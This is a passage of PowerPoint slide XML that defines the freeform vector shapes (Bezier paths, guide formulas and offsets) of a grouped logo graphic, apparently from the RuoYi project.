        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9773920" y="3198384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若依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Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="267335" y="211455"/>
            <a:ext cx="1409700" cy="479425"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1157" y="454"/>
              <a:ext cx="158" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 31"/>
                <a:gd name="T1" fmla="*/ 13 h 32"/>
                <a:gd name="T2" fmla="*/ 0 w 31"/>
                <a:gd name="T3" fmla="*/ 19 h 32"/>
                <a:gd name="T4" fmla="*/ 17 w 31"/>
                <a:gd name="T5" fmla="*/ 32 h 32"/>
                <a:gd name="T6" fmla="*/ 31 w 31"/>
                <a:gd name="T7" fmla="*/ 32 h 32"/>
                <a:gd name="T8" fmla="*/ 31 w 31"/>
                <a:gd name="T9" fmla="*/ 26 h 32"/>
                <a:gd name="T10" fmla="*/ 18 w 31"/>
                <a:gd name="T11" fmla="*/ 26 h 32"/>
                <a:gd name="T12" fmla="*/ 9 w 31"/>
                <a:gd name="T13" fmla="*/ 19 h 32"/>
                <a:gd name="T14" fmla="*/ 9 w 31"/>
                <a:gd name="T15" fmla="*/ 13 h 32"/>
                <a:gd name="T16" fmla="*/ 18 w 31"/>
                <a:gd name="T17" fmla="*/ 6 h 32"/>
                <a:gd name="T18" fmla="*/ 31 w 31"/>
                <a:gd name="T19" fmla="*/ 6 h 32"/>
                <a:gd name="T20" fmla="*/ 31 w 31"/>
                <a:gd name="T21" fmla="*/ 0 h 32"/>
                <a:gd name="T22" fmla="*/ 17 w 31"/>
                <a:gd name="T23" fmla="*/ 0 h 32"/>
                <a:gd name="T24" fmla="*/ 0 w 31"/>
                <a:gd name="T25" fmla="*/ 1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32">
                  <a:moveTo>
                    <a:pt x="0" y="13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26"/>
                    <a:pt x="4" y="32"/>
                    <a:pt x="17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1" y="26"/>
                    <a:pt x="21" y="26"/>
                    <a:pt x="18" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="9" y="22"/>
                    <a:pt x="9" y="19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0"/>
                    <a:pt x="12" y="6"/>
                    <a:pt x="18" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="6"/>
                    <a:pt x="31" y="6"/>
                    <a:pt x="31" y="6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4" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0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6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1706" y="454"/>
              <a:ext cx="153" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 30"/>
                <a:gd name="T1" fmla="*/ 6 h 32"/>
                <a:gd name="T2" fmla="*/ 30 w 30"/>
                <a:gd name="T3" fmla="*/ 6 h 32"/>
                <a:gd name="T4" fmla="*/ 30 w 30"/>
                <a:gd name="T5" fmla="*/ 0 h 32"/>
                <a:gd name="T6" fmla="*/ 17 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 32"/>
                <a:gd name="T8" fmla="*/ 0 w 30"/>
                <a:gd name="T9" fmla="*/ 13 h 32"/>
                <a:gd name="T10" fmla="*/ 0 w 30"/>
                <a:gd name="T11" fmla="*/ 19 h 32"/>
                <a:gd name="T12" fmla="*/ 17 w 30"/>
                <a:gd name="T13" fmla="*/ 32 h 32"/>
                <a:gd name="T14" fmla="*/ 30 w 30"/>
                <a:gd name="T15" fmla="*/ 32 h 32"/>
                <a:gd name="T16" fmla="*/ 30 w 30"/>
                <a:gd name="T17" fmla="*/ 26 h 32"/>
                <a:gd name="T18" fmla="*/ 17 w 30"/>
                <a:gd name="T19" fmla="*/ 26 h 32"/>
                <a:gd name="T20" fmla="*/ 8 w 30"/>
                <a:gd name="T21" fmla="*/ 19 h 32"/>
                <a:gd name="T22" fmla="*/ 8 w 30"/>
                <a:gd name="T23" fmla="*/ 13 h 32"/>
                <a:gd name="T24" fmla="*/ 17 w 30"/>
                <a:gd name="T25" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="17" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="6"/>
                    <a:pt x="30" y="6"/>
                    <a:pt x="30" y="6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" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="0" y="13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6"/>
                    <a:pt x="3" y="32"/>
                    <a:pt x="17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21" y="26"/>
                    <a:pt x="17" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="26"/>
                    <a:pt x="8" y="22"/>
                    <a:pt x="8" y="19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0"/>
                    <a:pt x="11" y="6"/>
                    <a:pt x="17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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1335" y="454"/>
              <a:ext cx="168" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 33"/>
                <a:gd name="T1" fmla="*/ 12 h 32"/>
                <a:gd name="T2" fmla="*/ 32 w 33"/>
                <a:gd name="T3" fmla="*/ 9 h 32"/>
                <a:gd name="T4" fmla="*/ 18 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 32"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 32"/>
                <a:gd name="T8" fmla="*/ 0 w 33"/>
                <a:gd name="T9" fmla="*/ 32 h 32"/>
                <a:gd name="T10" fmla="*/ 9 w 33"/>
                <a:gd name="T11" fmla="*/ 32 h 32"/>
                <a:gd name="T12" fmla="*/ 9 w 33"/>
                <a:gd name="T13" fmla="*/ 6 h 32"/>
                <a:gd name="T14" fmla="*/ 18 w 33"/>
                <a:gd name="T15" fmla="*/ 6 h 32"/>
                <a:gd name="T16" fmla="*/ 24 w 33"/>
                <a:gd name="T17" fmla="*/ 10 h 32"/>
                <a:gd name="T18" fmla="*/ 24 w 33"/>
                <a:gd name="T19" fmla="*/ 12 h 32"/>
                <a:gd name="T20" fmla="*/ 18 w 33"/>
                <a:gd name="T21" fmla="*/ 16 h 32"/>
                <a:gd name="T22" fmla="*/ 13 w 33"/>
                <a:gd name="T23" fmla="*/ 16 h 32"/>
                <a:gd name="T24" fmla="*/ 13 w 33"/>
                <a:gd name="T25" fmla="*/ 18 h 32"/>
                <a:gd name="T26" fmla="*/ 22 w 33"/>
                <a:gd name="T27" fmla="*/ 32 h 32"/>
                <a:gd name="T28" fmla="*/ 33 w 33"/>
                <a:gd name="T29" fmla="*/ 32 h 32"/>
                <a:gd name="T30" fmla="*/ 25 w 33"/>
                <a:gd name="T31" fmla="*/ 20 h 32"/>
                <a:gd name="T32" fmla="*/ 32 w 33"/>
                <a:gd name="T33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32">
                  <a:moveTo>
                    <a:pt x="32" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="5"/>
                    <a:pt x="30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23" y="6"/>
                    <a:pt x="24" y="8"/>
                    <a:pt x="24" y="10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3"/>
                    <a:pt x="23" y="16"/>
                    <a:pt x="18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31" y="19"/>
                    <a:pt x="32" y="16"/>
                    <a:pt x="32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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1523" y="454"/>
              <a:ext cx="168" cy="167"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 32 w 33"/>
                <a:gd name="T1" fmla="*/ 12 h 32"/>
                <a:gd name="T2" fmla="*/ 32 w 33"/>
                <a:gd name="T3" fmla="*/ 9 h 32"/>
                <a:gd name="T4" fmla="*/ 18 w 33"/>
                <a:gd name="T5" fmla="*/ 0 h 32"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 32"/>
                <a:gd name="T8" fmla="*/ 0 w 33"/>
                <a:gd name="T9" fmla="*/ 32 h 32"/>
                <a:gd name="T10" fmla="*/ 9 w 33"/>
                <a:gd name="T11" fmla="*/ 32 h 32"/>
                <a:gd name="T12" fmla="*/ 9 w 33"/>
                <a:gd name="T13" fmla="*/ 6 h 32"/>
                <a:gd name="T14" fmla="*/ 18 w 33"/>
                <a:gd name="T15" fmla="*/ 6 h 32"/>
                <a:gd name="T16" fmla="*/ 23 w 33"/>
                <a:gd name="T17" fmla="*/ 10 h 32"/>
                <a:gd name="T18" fmla="*/ 23 w 33"/>
                <a:gd name="T19" fmla="*/ 12 h 32"/>
                <a:gd name="T20" fmla="*/ 18 w 33"/>
                <a:gd name="T21" fmla="*/ 16 h 32"/>
                <a:gd name="T22" fmla="*/ 13 w 33"/>
                <a:gd name="T23" fmla="*/ 16 h 32"/>
                <a:gd name="T24" fmla="*/ 13 w 33"/>
                <a:gd name="T25" fmla="*/ 18 h 32"/>
                <a:gd name="T26" fmla="*/ 22 w 33"/>
                <a:gd name="T27" fmla="*/ 32 h 32"/>
                <a:gd name="T28" fmla="*/ 33 w 33"/>
                <a:gd name="T29" fmla="*/ 32 h 32"/>
                <a:gd name="T30" fmla="*/ 25 w 33"/>
                <a:gd name="T31" fmla="*/ 20 h 32"/>
                <a:gd name="T32" fmla="*/ 32 w 33"/>
                <a:gd name="T33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32">
                  <a:moveTo>
                    <a:pt x="32" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                    <a:pt x="32" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="5"/>
                    <a:pt x="30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23" y="6"/>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="1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3"/>
                    <a:pt x="23" y="16"/>
                    <a:pt x="18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30" y="19"/>
                    <a:pt x="32" y="16"/>
                    <a:pt x="32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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="729" y="417"/>
              <a:ext cx="77" cy="47"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 15"/>
                <a:gd name="T1" fmla="*/ 0 h 9"/>
                <a:gd name="T2" fmla="*/ 0 w 15"/>
                <a:gd name="T3" fmla="*/ 1 h 9"/>
                <a:gd name="T4" fmla="*/ 0 w 15"/>
                <a:gd name="T5" fmla="*/ 8 h 9"/>
                <a:gd name="T6" fmla="*/ 2 w 15"/>
                <a:gd name="T7" fmla="*/ 9 h 9"/>
                <a:gd name="T8" fmla="*/ 15 w 15"/>
                <a:gd name="T9" fmla="*/ 9 h 9"/>
                <a:gd name="T10" fmla="*/ 15 w 15"/>
                <a:gd name="T11" fmla="*/ 0 h 9"/>
                <a:gd name="T12" fmla="*/ 2 w 15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9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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="862" y="417"/>
              <a:ext cx="71" cy="47"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 13 w 14"/>
                <a:gd name="T1" fmla="*/ 0 h 9"/>
                <a:gd name="T2" fmla="*/ 14 w 14"/>
                <a:gd name="T3" fmla="*/ 1 h 9"/>
                <a:gd name="T4" fmla="*/ 14 w 14"/>
                <a:gd name="T5" fmla="*/ 8 h 9"/>
                <a:gd name="T6" fmla="*/ 13 w 14"/>
                <a:gd name="T7" fmla="*/ 9 h 9"/>
                <a:gd name="T8" fmla="*/ 0 w 14"/>
                <a:gd name="T9" fmla="*/ 9 h 9"/>
                <a:gd name="T10" fmla="*/ 0 w 14"/>
                <a:gd name="T11" fmla="*/ 0 h 9"/>
                <a:gd name="T12" fmla="*/ 13 w 1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">
                  <a:moveTo>
                    <a:pt x="13" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="0"/>
                    <a:pt x="14" y="1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9"/>
                    <a:pt x="13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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="633" y="334"/>
              <a:ext cx="173" cy="214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 34"/>
                <a:gd name="T1" fmla="*/ 12 h 41"/>
                <a:gd name="T2" fmla="*/ 15 w 34"/>
                <a:gd name="T3" fmla="*/ 8 h 41"/>
                <a:gd name="T4" fmla="*/ 34 w 34"/>
                <a:gd name="T5" fmla="*/ 8 h 41"/>
                <a:gd name="T6" fmla="*/ 34 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 12 w 34"/>
                <a:gd name="T9" fmla="*/ 0 h 41"/>
                <a:gd name="T10" fmla="*/ 0 w 34"/>
                <a:gd name="T11" fmla="*/ 11 h 41"/>
                <a:gd name="T12" fmla="*/ 0 w 34"/>
                <a:gd name="T13" fmla="*/ 30 h 41"/>
                <a:gd name="T14" fmla="*/ 12 w 34"/>
                <a:gd name="T15" fmla="*/ 41 h 41"/>
                <a:gd name="T16" fmla="*/ 34 w 34"/>
                <a:gd name="T17" fmla="*/ 41 h 41"/>
                <a:gd name="T18" fmla="*/ 34 w 34"/>
                <a:gd name="T19" fmla="*/ 32 h 41"/>
                <a:gd name="T20" fmla="*/ 15 w 34"/>
                <a:gd name="T21" fmla="*/ 32 h 41"/>
                <a:gd name="T22" fmla="*/ 11 w 34"/>
                <a:gd name="T23" fmla="*/ 28 h 41"/>
                <a:gd name="T24" fmla="*/ 11 w 34"/>
                <a:gd name="T25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41">
                  <a:moveTo>
                    <a:pt x="11" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="10"/>
                    <a:pt x="13" y="8"/>
                    <a:pt x="15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6"/>
                    <a:pt x="5" y="41"/>
                    <a:pt x="12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3" y="32"/>
                    <a:pt x="11" y="31"/>
                    <a:pt x="11" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="12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2"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="862" y="334"/>
              <a:ext cx="168" cy="214"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 23 w 33"/>
                <a:gd name="T1" fmla="*/ 12 h 41"/>
                <a:gd name="T2" fmla="*/ 19 w 33"/>
                <a:gd name="T3" fmla="*/ 8 h 41"/>
                <a:gd name="T4" fmla="*/ 0 w 33"/>
                <a:gd name="T5" fmla="*/ 8 h 41"/>
                <a:gd name="T6" fmla="*/ 0 w 33"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 22 w 33"/>
                <a:gd name="T9" fmla="*/ 0 h 41"/>
                <a:gd name="T10" fmla="*/ 33 w 33"/>
                <a:gd name="T11" fmla="*/ 11 h 41"/>
                <a:gd name="T12" fmla="*/ 33 w 33"/>
                <a:gd name="T13" fmla="*/ 30 h 41"/>
                <a:gd name="T14" fmla="*/ 22 w 33"/>
                <a:gd name="T15" fmla="*/ 41 h 41"/>
                <a:gd name="T16" fmla="*/ 0 w 33"/>
                <a:gd name="T17" fmla="*/ 41 h 41"/>
                <a:gd name="T18" fmla="*/ 0 w 33"/>
                <a:gd name="T19" fmla="*/ 32 h 41"/>
                <a:gd name="T20" fmla="*/ 19 w 33"/>
                <a:gd name="T21" fmla="*/ 32 h 41"/>
                <a:gd name="T22" fmla="*/ 23 w 33"/>
                <a:gd name="T23" fmla="*/ 28 h 41"/>
                <a:gd name="T24" fmla="*/ 23 w 33"/>
                <a:gd name="T25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41">
                  <a:moveTo>
                    <a:pt x="23" y="12"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="21" y="8"/>
                    <a:pt x="19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9" y="0"/>
                    <a:pt x="33" y="5"/>
                    <a:pt x="33" y="1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6"/>
                    <a:pt x="28" y="41"/>
                    <a:pt x="22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1" y="32"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="23" y="28"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="23" y="12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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="633" y="230"/>
              <a:ext cx="402" cy="78"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 229 w 402"/>
                <a:gd name="T1" fmla="*/ 31 h 78"/>
                <a:gd name="T2" fmla="*/ 229 w 402"/>
                <a:gd name="T3" fmla="*/ 0 h 78"/>
                <a:gd name="T4" fmla="*/ 173 w 402"/>
                <a:gd name="T5" fmla="*/ 0 h 78"/>
                <a:gd name="T6" fmla="*/ 173 w 402"/>
                <a:gd name="T7" fmla="*/ 31 h 78"/>
                <a:gd name="T8" fmla="*/ 0 w 402"/>
                <a:gd name="T9" fmla="*/ 31 h 78"/>
                <a:gd name="T10" fmla="*/ 0 w 402"/>
                <a:gd name="T11" fmla="*/ 78 h 78"/>
                <a:gd name="T12" fmla="*/ 402 w 402"/>
                <a:gd name="T13" fmla="*/ 78 h 78"/>
                <a:gd name="T14" fmla="*/ 402 w 402"/>
                <a:gd name="T15" fmla="*/ 31 h 78"/>
                <a:gd name="T16" fmla="*/ 229 w 402"/>
                <a:gd name="T17" fmla="*/ 3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2" h="78">
                  <a:moveTo>
                    <a:pt x="229" y="31"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="31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4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="633" y="574"/>
              <a:ext cx="402" cy="73"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 229 w 402"/>
                <a:gd name="T1" fmla="*/ 47 h 73"/>
                <a:gd name="T2" fmla="*/ 229 w 402"/>
                <a:gd name="T3" fmla="*/ 73 h 73"/>
                <a:gd name="T4" fmla="*/ 173 w 402"/>
                <a:gd name="T5" fmla="*/ 73 h 73"/>
                <a:gd name="T6" fmla="*/ 173 w 402"/>
                <a:gd name="T7" fmla="*/ 47 h 73"/>
                <a:gd name="T8" fmla="*/ 0 w 402"/>
                <a:gd name="T9" fmla="*/ 47 h 73"/>
                <a:gd name="T10" fmla="*/ 0 w 402"/>
                <a:gd name="T11" fmla="*/ 0 h 73"/>
                <a:gd name="T12" fmla="*/ 402 w 402"/>
                <a:gd name="T13" fmla="*/ 0 h 73"/>
                <a:gd name="T14" fmla="*/ 402 w 402"/>
                <a:gd name="T15" fmla="*/ 47 h 73"/>
                <a:gd name="T16" fmla="*/ 229 w 402"/>
                <a:gd name="T17" fmla="*/ 4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2" h="73">
                  <a:moveTo>
                    <a:pt x="229" y="47"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173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402" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="402" y="47"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229" y="47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5"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1157" y="261"/>
              <a:ext cx="152" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 26 w 30"/>
                <a:gd name="T1" fmla="*/ 5 h 29"/>
                <a:gd name="T2" fmla="*/ 17 w 30"/>
                <a:gd name="T3" fmla="*/ 5 h 29"/>
                <a:gd name="T4" fmla="*/ 17 w 30"/>
                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 12 w 30"/>
                <a:gd name="T7" fmla="*/ 0 h 29"/>
                <a:gd name="T8" fmla="*/ 12 w 30"/>
                <a:gd name="T9" fmla="*/ 5 h 29"/>
                <a:gd name="T10" fmla="*/ 0 w 30"/>
                <a:gd name="T11" fmla="*/ 5 h 29"/>
                <a:gd name="T12" fmla="*/ 0 w 30"/>
                <a:gd name="T13" fmla="*/ 22 h 29"/>
                <a:gd name="T14" fmla="*/ 12 w 30"/>
                <a:gd name="T15" fmla="*/ 22 h 29"/>
                <a:gd name="T16" fmla="*/ 12 w 30"/>
                <a:gd name="T17" fmla="*/ 29 h 29"/>
                <a:gd name="T18" fmla="*/ 17 w 30"/>
                <a:gd name="T19" fmla="*/ 29 h 29"/>
                <a:gd name="T20" fmla="*/ 17 w 30"/>
                <a:gd name="T21" fmla="*/ 22 h 29"/>
                <a:gd name="T22" fmla="*/ 30 w 30"/>
                <a:gd name="T23" fmla="*/ 22 h 29"/>
                <a:gd name="T24" fmla="*/ 30 w 30"/>
                <a:gd name="T25" fmla="*/ 9 h 29"/>
                <a:gd name="T26" fmla="*/ 26 w 30"/>
                <a:gd name="T27" fmla="*/ 5 h 29"/>
                <a:gd name="T28" fmla="*/ 12 w 30"/>
                <a:gd name="T29" fmla="*/ 18 h 29"/>
                <a:gd name="T30" fmla="*/ 5 w 30"/>
                <a:gd name="T31" fmla="*/ 18 h 29"/>
                <a:gd name="T32" fmla="*/ 5 w 30"/>
                <a:gd name="T33" fmla="*/ 8 h 29"/>
                <a:gd name="T34" fmla="*/ 12 w 30"/>
                <a:gd name="T35" fmla="*/ 8 h 29"/>
                <a:gd name="T36" fmla="*/ 12 w 30"/>
                <a:gd name="T37" fmla="*/ 18 h 29"/>
                <a:gd name="T38" fmla="*/ 24 w 30"/>
                <a:gd name="T39" fmla="*/ 18 h 29"/>
                <a:gd name="T40" fmla="*/ 17 w 30"/>
                <a:gd name="T41" fmla="*/ 18 h 29"/>
                <a:gd name="T42" fmla="*/ 17 w 30"/>
                <a:gd name="T43" fmla="*/ 8 h 29"/>
                <a:gd name="T44" fmla="*/ 23 w 30"/>
                <a:gd name="T45" fmla="*/ 8 h 29"/>
                <a:gd name="T46" fmla="*/ 24 w 30"/>
                <a:gd name="T47" fmla="*/ 10 h 29"/>
                <a:gd name="T48" fmla="*/ 24 w 30"/>
                <a:gd name="T49" fmla="*/ 1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" h="29">
                  <a:moveTo>
                    <a:pt x="26" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="5"/>
                    <a:pt x="17" y="5"/>
                    <a:pt x="17" y="5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0" y="22"/>
                    <a:pt x="30" y="13"/>
                    <a:pt x="30" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="6"/>
                    <a:pt x="28" y="5"/>
                    <a:pt x="26" y="5"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="18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12" y="8"/>
                    <a:pt x="12" y="8"/>
                    <a:pt x="12" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="18"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="1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21" y="8"/>
                    <a:pt x="23" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="8"/>
                    <a:pt x="24" y="9"/>
                    <a:pt x="24" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="12"/>
                    <a:pt x="24" y="18"/>
                    <a:pt x="24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6"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1528" y="261"/>
              <a:ext cx="148" cy="151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 25 w 29"/>
                <a:gd name="T1" fmla="*/ 5 h 29"/>
                <a:gd name="T2" fmla="*/ 17 w 29"/>
                <a:gd name="T3" fmla="*/ 5 h 29"/>
                <a:gd name="T4" fmla="*/ 17 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 29"/>
                <a:gd name="T6" fmla="*/ 12 w 29"/>
                <a:gd name="T7" fmla="*/ 0 h 29"/>
                <a:gd name="T8" fmla="*/ 12 w 29"/>
                <a:gd name="T9" fmla="*/ 5 h 29"/>
                <a:gd name="T10" fmla="*/ 0 w 29"/>
                <a:gd name="T11" fmla="*/ 5 h 29"/>
                <a:gd name="T12" fmla="*/ 0 w 29"/>
                <a:gd name="T13" fmla="*/ 22 h 29"/>
                <a:gd name="T14" fmla="*/ 12 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 29"/>
                <a:gd name="T16" fmla="*/ 12 w 29"/>
                <a:gd name="T17" fmla="*/ 29 h 29"/>
                <a:gd name="T18" fmla="*/ 17 w 29"/>
                <a:gd name="T19" fmla="*/ 29 h 29"/>
                <a:gd name="T20" fmla="*/ 17 w 29"/>
                <a:gd name="T21" fmla="*/ 22 h 29"/>
                <a:gd name="T22" fmla="*/ 29 w 29"/>
                <a:gd name="T23" fmla="*/ 22 h 29"/>
                <a:gd name="T24" fmla="*/ 29 w 29"/>
                <a:gd name="T25" fmla="*/ 9 h 29"/>
                <a:gd name="T26" fmla="*/ 25 w 29"/>
                <a:gd name="T27" fmla="*/ 5 h 29"/>
                <a:gd name="T28" fmla="*/ 12 w 29"/>
                <a:gd name="T29" fmla="*/ 18 h 29"/>
                <a:gd name="T30" fmla="*/ 5 w 29"/>
                <a:gd name="T31" fmla="*/ 18 h 29"/>
                <a:gd name="T32" fmla="*/ 5 w 29"/>
                <a:gd name="T33" fmla="*/ 8 h 29"/>
                <a:gd name="T34" fmla="*/ 12 w 29"/>
                <a:gd name="T35" fmla="*/ 8 h 29"/>
                <a:gd name="T36" fmla="*/ 12 w 29"/>
                <a:gd name="T37" fmla="*/ 18 h 29"/>
                <a:gd name="T38" fmla="*/ 24 w 29"/>
                <a:gd name="T39" fmla="*/ 18 h 29"/>
                <a:gd name="T40" fmla="*/ 17 w 29"/>
                <a:gd name="T41" fmla="*/ 18 h 29"/>
                <a:gd name="T42" fmla="*/ 17 w 29"/>
                <a:gd name="T43" fmla="*/ 8 h 29"/>
                <a:gd name="T44" fmla="*/ 22 w 29"/>
                <a:gd name="T45" fmla="*/ 8 h 29"/>
                <a:gd name="T46" fmla="*/ 24 w 29"/>
                <a:gd name="T47" fmla="*/ 10 h 29"/>
                <a:gd name="T48" fmla="*/ 24 w 29"/>
                <a:gd name="T49" fmla="*/ 1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9" h="29">
                  <a:moveTo>
                    <a:pt x="25" y="5"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="5"/>
                    <a:pt x="17" y="5"/>
                    <a:pt x="17" y="5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13"/>
                    <a:pt x="29" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="6"/>
                    <a:pt x="27" y="5"/>
                    <a:pt x="25" y="5"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="12" y="18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12" y="8"/>
                    <a:pt x="12" y="8"/>
                    <a:pt x="12" y="8"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="12" y="18"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="18"/>
                    <a:pt x="17" y="1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21" y="8"/>
                    <a:pt x="22" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
